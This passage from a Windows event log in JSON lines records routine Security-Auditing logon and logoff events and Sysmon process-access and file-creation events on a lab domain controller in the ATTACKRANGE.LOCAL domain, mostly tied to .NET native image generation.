KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa3b10","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50237","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220706,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA3AA2\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa3aa2","LogonType":"3","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220707,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA3A57\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa3a57","LogonType":"3","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6633,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.164\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.164","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6634,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.164\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.164","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6635,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.164\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.164","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220708,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA394A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa394a","LogonType":"3","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6636,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.523\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21E4-5F25-0000-0010123E0A00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.523","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21E4-5F25-0000-0010123E0A00}","TargetProcessId":"3068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6637,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.523\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21E4-5F25-0000-0010123E0A00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.523","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21E4-5F25-0000-0010123E0A00}","TargetProcessId":"3068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6638,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.523\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21E4-5F25-0000-0010123E0A00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.523","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21E4-5F25-0000-0010123E0A00}","TargetProcessId":"3068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6639,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:57.695\r\nProcessGuid: {41C8662E-21E4-5F25-0000-0010123E0A00}\r\nProcessId: 3068\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bfc-0\\System.Windows.Forms.dll\r\nCreationUtcTime: 2020-08-01 08:03:57.695","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:57.695","ProcessGuid":"{41C8662E-21E4-5F25-0000-0010123E0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bfc-0\\System.Windows.Forms.dll","CreationUtcTime":"2020-08-01 08:03:57.695","EventReceivedTime":"2020-08-01 08:03:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6640,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:57.898\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21ED-5F25-0000-001099440A00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4